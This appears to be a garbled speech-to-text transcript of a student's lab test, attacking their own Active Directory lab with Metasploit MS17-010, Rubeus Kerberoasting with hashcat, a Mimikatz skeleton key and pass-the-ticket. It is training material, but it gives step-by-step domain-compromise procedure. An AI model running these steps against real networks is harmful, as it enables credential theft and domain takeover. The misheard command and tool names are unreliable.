Hi. So for the practical test, I'm doing the option 2 and I have three VMs set up for that. One is my Kali machine, which is my attacking machine, and I have my Windows Server 2016 where my Active Directory is being installed, and I have my Windows 7 machine, which is my client machine, which is connected to my domain. So in the Windows Server 2016, I already had made a domain, and my domain name is roshan.com. So if I take my Active Directory users and computer window, I could see my domain name, which is roshan.com. Okay, and I have given 4 GB of RAM for my Windows Server 2016, and for Windows 7 too, and for Kali too, I have given 4 GB of RAM. Okay, so first I'm going to do the Kerberos attack, and I'm doing using Robust tool. For that, first I'm going to access my Server 2016. Before that, I'm going to type nmap scan to see the open ports in my Windows Server 2016. I'm going to type 192 nmap 192.168.225.4.144. Okay, I could see that my host is up. I'm going to type minus sn. Okay, that doesn't work. So I'm going to type minus p to see the open ports. Okay, so I need to type minus pn because here I could see, but if it's blocking our ping probes, try minus pn. So I'm trying pn. Okay, and I could see the ports which are open, and I could see that port 139 and 445 are open, which are used by SMP service. So I'm going to open my MS console by typing the MS console command, and I'm going to perform the exploit. So this is going to take some time. Okay, it's open, and I'm going to search for exploit modules. Okay, search exploit. Okay, spelling mistake. So I'm going to use this exploit Windows SMP MS17010 PSX. For that, I'm going to use the exploit. I'm going to type the command use exploit. Then I'm pasting the module name. Okay, and now I'm going to type set our host command to set the target IP 192.168.225.144, and then my L host, which is my Kali VM, which is having IP 192.168.225.139. Okay, I made it wrong, so I'm exiting this and opening the console again. Okay, I'm going to type in the commands again. Use exploit. Okay, and then set our host. Then my set lhost command where I made mistake, so it's 139. Then I'm going to type my L port, which is 444, the listening port that I'm giving. So we can give any port here. So I'm running the exploit. So this will create a Metapredator shell. Okay, so after the shell is being opened, so I'm going to type shell to open my CMD, then my PowerShell along with that. Okay, I'm going to type PowerShell, and now I'm going to run Rubus. Okay, cd I'm really not sure about the directory where Rubus is there, so I'm going to exit from. Okay, from here I'm going to type cd users public. Okay, after this I'm going to check the directories that I have inside my public folder. Okay, now I'm going to type cd ghost pack compiled binaries. So now I got my file, so I'm going to open the shell, sorry, PowerShell pack. Okay, now I'm going to type cd ghost pack, so it's easier to copy paste. So I'm going to copy. Okay, and inside this I have my Rubus, and for that I'm going to type /Rubus.exe space Kerberos. And now I'm going to specify my output file where the hashes should be saved. So I'm going to type /out file, then hashes. I'm going to give it the name hashes.kerberos. Okay, here I have saved, and you could see that it's saved inside this directory hashes.kerberos. So I'm going to type cat. Okay, now I'm going to go inside this directory. Okay, I'm already inside the directory, so I'm going to type hashes.kerberos. Okay, now I could see my hash file. So what I'm going to do is I'm going to copy this and save it to my Kali VM. So I'm opening another file, like another terminal. Then I'm going to be the root user, go inside my desktop directory, then I'm going to save this in a file called hash.txt. Then I'm going to paste the output, and it got saved in a single line, which is what I wanted. So I'm saving it. Now I'm going to use the hashcat command to crack the hashes. So for that I'm going to type the command hashcat Okay, for that I'm going to type the command hashcat -m. Okay, I'm searching for the command hashcat. Okay, so I'm going to type the command hashcat -m. Okay, I have the command here which I typed earlier. So here instead of that I'm going to type the command file hash.txt. This is the advantage of Kali. I get to know my commands. Okay, then I'm going to press enter. And this is roku.txt which contains a lot of passwords. So I'm trying to crack the password. Okay, here. Okay, I could see that the hashcat is being cracked. And okay, my server is getting hanged. Okay, and hashcat is okay, hashcat and my password is being cracked. So I'm going to type ls. So I'm going to type cd cracked to see my output file. Sorry, cat cracked. Okay, this cracked file already had a file, so it got repeated. So I'm going to run the hashcat command again. So here instead of cracked I'm going to give a new name. Okay, I'm going to give crack this time, so it gets saved inside the file crack. Okay, now I'm going to type cat cracked. Okay, crack, and I could see the password here, and this is my administrative password, and I was able to successfully crack the administrative password. For performing the skeleton attack, first I'm creating a Meterpreter shell, like creating a reverse TCP shell on the Windows Server 2016, and using a skeleton key, uh, any user can log in to the domain with the password Mimikatz. So here, first I'm going to open the Meterpreter shell and do the exploit, and the skeleton key commands are run from Mimikatz. First I'm doing the exploitation. Okay, I'm using the exploit psx. So I'm searching for the module, exploit module. Okay, I'm going to use exploit. Then I'm going to copy the module name. Then I'm going to set the L host. (168.225.139). Then the R host. Then the L port for listening. and I'm going to run the exploit, and this should open a interpreter shell. Okay, and the shell is being opened, and after the shell is being opened, I'm going to type the command shell to access the command prompt. So here I'm going to open the Mimikatz. So cd users public cd Mimikatz. So here I'm going to type directory to see I have the exe file. So that I'm going to type the command /mimikatz to start the Mimikatz. Okay, before that I'm going to be in PowerShell. Okay, now I'm in my PowerShell and I open Mimikatz. So now here I'm going to type the command privilege debug. Next I'm going to type skeleton command. Since I have already run the command, this okay, skeleton command is being run, and we could see that key patch is okay and the decrypt patch is also okay. So next I'm going to run, like, exit from my Mimikatz. Now I have successfully run the skeleton key. So now I'm going to exit and trying to make a copy of the admin folder to my server using the Mimikatz password. So after using the skeleton key, every user can log into the server domain controller using Mimikatz password. So now I'm going to use the netuse command. Okay, I have exited from Mimikatz, and now I'm going to exit from my PowerShell, and I'm going to type the netuse command, netuse, then a variable name for my shared folder that I'm going to create, then the computer name, win, the full computer name, win OAI 7 LMESSVV dot roshan.com, which is my full computer name of the server. Then I'm going to type slash. So I'm going to clone the C folder. I'm going to create a shared folder of the C drive of the server 2016, and I'm going to type the user as administrator. With the password Mimikatz, as I have explained earlier. It is showing error. So I will run this command from server 2016. So for server 2016, if I log out, I could see that I can log in with the password Mimikatz after running that skeleton key command. So here I'm going to log in to my server. So first I'm going to log into my server with the original password. So as you can see, I'm going to type my real password for my administrator now. So this is my real password. I'm going to log in. So I'm logged into my server. Next, I'm going to log out and sign out, and I'm going to log in as the Mimikatz password. So here I'm going to type Mimikatz here. As you can see, now I have given the password Mimikatz. I'm going to log in. See, so I'm able to log in with the Mimikatz password, and it is not for the administrator. Every user, like I can log in as every user with the same password Mimikatz. So here now I'm going to sign out again, and I'm going to log into another user bar account which I have created in my domain. Okay, here instead of administrator, now I'm going to log in as bar account, the rate my domain name. I'm going to type the same password Mimikatz master password. Okay, and when I log in with that password, I am successfully able to log in. Okay, now I'm going to sign out, and I'm going to create a shared admin folder. So for that, I'm going to again access my administrator, my domain name, with the Mimikatz password. Okay, now I'm going to open my command prompt. Now I'm going to type the netuse command. Zero AI 7 L M E S S V V slash C drive, then slash user administrator with the password Mimikatz. Okay, I know what's the error because I haven't specified my full computer name here. So I'm going to type this command again, paste it over here. Then I'm going to type my full computer name, roshan.com/c, then user administrator Mimikatz. Okay, okay, now I got the error. Again, I made a mistake. I put wrong command here. Okay, now this command. So it's showing that the password that I have typed is wrong. Here instead of C, I'm going to type admin, and we could see that I was able to create a folder with the password Mimikatz itself. So here, this PC, when I take this PC, I could Command completed successfully. So this, okay, another error that I made was I haven't specified any path here. So I'm specifying a path here. Okay, now the command is being successfully done. So here we could see that, okay, shared folder of the admin is being made. You could see ATWS, then the boot files. So when we take the C drive, we take Windows, we could see the same file. So a shared folder, admin folder is being made here using the netcat command, and I have used the password mimikatz. Since I have used the skeleton key, I could log into any user with the mimikatz, and I could use any commands with any user, the password mimikatz. Now I'm going to perform the pass ticket attack, and for that I have my 3 VMs Kali Linux, which is having IP 192.168. Okay, I'm going to show that. PPR, okay, IPBRA, which is having 192.168, 225 to 139, and my client VM, which is having IP. So I'm going to log out from my client now, and here in my client I'm logging in as Baracon user, which is the user that I've created without any privileges. So when I take, okay, when I take my server VM, selected. Okay. When I take my server VM, I could open my dsa.msc to view the user, Paracon user. When I take properties, I could see that the user is a member. Okay, users, properties, member of just a normal user who doesn't have any privileges. So here in my Windows 7 VM, I've logged in as Paracon user, and I'm using the password. So here first I'm going to change the wallpaper. Okay, I think I have my wallpaper ready in my host system. I just need to copy paste. Okay, and I have my, so here if I take system properties, I could see the computer name and the domain which is connected to, and I'm logged in as Paragon user here. So in order to show that I don't have any privileges, first I'm going to open my CMD. First I will show the IP address of the Windows 7 VM. So here I'm having IP 192.168.225.143, and in order to show that I don't have any privileges, that I'm typing this command win AI7L, giving my computer name here, seven LMESS ev.roshan.com, which is my full computer name of the server. And I'm trying to access the admin folder. So I'm giving admin, then pressing enter. So we could see that access is being denied. Now what I'm going to do for this attack is I'm going to export the tickets from my server 2016 VM, my domain controller, and then I'm going to first export the tickets there. Then I'm going to copy the tickets to my client VM where I have logged in as my normal user Paragon, and I'm trying to inject the ticket into my memory using the ptt command, Kerberos ptt, pass the hash and pass the ticket command, sorry. Then I'm going to get access to my admin folder after injecting the ticket into my memory. So for that, first I'm going to, okay, now access is denied here. So now I'm going to open my Windows Server 2016 to show the IP address, cmd ipconfig. Okay, I'm having 225.144, same IP address I had. So here first I'm going to access my Windows Server 2016 VM. For that, I'm opening Microsoft Console. Okay, so now I'm going to search for exploit. Yes, so I'm going to use the exploit. Set lhost, set rhost, which I'm giving the IP address of my target VM, 192.168.225.144. Then my L port for listening, and I'm running the exploit to open the Meterpreter shell. Okay, then I'm going to type shell command, and I'm going to open my Mimikatz. I'm going to load my Mimikatz, like load the Mimikatz in my server 2016. So here cd users public Mimikatz. Okay, cd type./Mimikatz. Okay, I have successfully loaded my Mimikatz. So after I have loaded my Mimikatz, I'm going to type the following commands. First, privilege debug command. Okay. Okay, then I'm going to load the command se sec urlsa tickets /export to export my tickets. When I run this command, I could see all my tickets here. So after that, I'm going to type the command okay, after running these commands, I'm going to type the command misc cmd. Okay, now tickets are being loaded into my Mimikatz folder. When I type directory, I could see all the tickets which I have. So from here, I'm going to check that I'm going to search for the tickets administrator at the rate krbtgt roshan.co, and now using the metaprinter. So after finding the ticket, I'm going to exit from the PowerShell, okay, from the command prompt, and in the metaprinter, I'm going to go inside the directory. Okay, now I'm going to go inside cd users public Mimikatz. Okay, there's some error in the path. So I'm going to type pwd again. Okay, cd users, cd public Mimikatz master, and now I have my x64 directory in this location, so I'm going to download x64. As you can see, it is being downloaded to my home Kali. So I'm going to open my another terminal and type sudo su, and I'm going to access. So when I type ls, I could see the directory x64 which is being copied, which contains all the tickets. So here, okay, now I'm going to open my directory x64. When I type directory, I could see all the tickets which are being copied. So from here, I'm going to pick the administrator. I'm going to pick this ticket, administrator at the rate krbtgt roshan.com. So I'm going to copy these. So here I'm going to type the command. I'm going to rename this ticket into a shorter name, so easier for easy use. So here I'm going to type copy, then the file name, okay, then I'm going to copy my home Kali itself, and here I'm going to type a new name for the file. So I'm going to save it as admin.kirby. So since we are getting administrative privileges, I'm renaming it as admin.kirby. Okay, home Kali. And when I go back, I could see the ticket is being renamed to admin.kirby. I can get into that admin.kirby. So this is the ticket that we are going to use to get privileges. So it's all encrypted. I can see it. So now I'm going to do is I'm going to copy this to my Windows client. So here I'm going to type scp, then the file name home Kali admin.kirby. space, then my original user, i.e. user at the rate, and then I'm going to keep the password of the file. So it's 168.225.143. Then the folders, I'm going to save it to my C folder, C users, Roshan, sorry. Okay, from here I'm going to copy the path first, so it's easier for me. C users public. I'm going to open the another terminal. I'm going to type the same thing over here. C users public, and I'm pressing enter to send the file, and I'm going to give password, and as we can see the file is being sent to my Windows 7 machine. So what I'm going to do is I'm going to end the Meterpreter session which I've created here. This is for my Windows Server 2016. So I'm going to exit the Meterpreter session, and I'm going to exploit my, so I'm going to exit this session, and I'm going to open the MS console again, and I'm going to do the exploit on my client machine. Okay, and okay, before that I'm going to type this command again, and I'm going to save this save this key inside my Mimikatz folder, so it will be easier for me to load the commands. Mimikatz x64, and it's asking for password. I hope this works, and doesn't work. I think permission issue p. Okay, and I was successfully able to copy the file using the sp command. Okay, now I have the file here. Okay, so I have sent the file home kali admin.kirby to the public folder so that I can see it in any user, and we could see that the file has been sent successfully, and the IP address is 143, which is my Windows client machine. Okay, now I'm going to open my client machine. So we have did this early that I don't have access, and now I'm going to type the command again to show that I don't have access. So here directory command. So now this key that I have sent should be visible in the public folder, so my user background also could see that. Okay, the public Mimikatz x64, and I could see the key which has been sent admin.kirby. So after this I'm going to open PowerShell here in my client machine, and I'm going to load this key. PowerShell. Okay, now I'm going to go inside the public folder, cd public, then cd. Okay, public of Mimikatz. So I have saved the key inside the Mimikatz folder because I could easily run the command from Mimikatz. cd x64. First I'm going to load the Mimikatz. Okay, here /Mimikatz. Now I'm going to type the command privilege Okay, no need of that. I just need to type Kerberos ptt command to pass the ticket to the to load the ticket into my memory. So then I need to type the ticket name. So here for me it is admin.kirby, and I could see that it is being run successfully. Now what I'm going to do is I'm going to type the same command directory, and as you can see I could see the admin directories. So earlier I was getting a denial. Now I was successfully able to see the directory after injecting the key. So the pass the hash ticket is being done, and in order to verify that I'm viewing my admin directories, I'm going to open my server. So I have my files like adfs, adws. So I'm going to open my server 2016. Okay, and login as administrator. And as you can see, my folder, so here in my admin folder I have the same files. Okay, and I have done the pass the hash ticket, and thank you.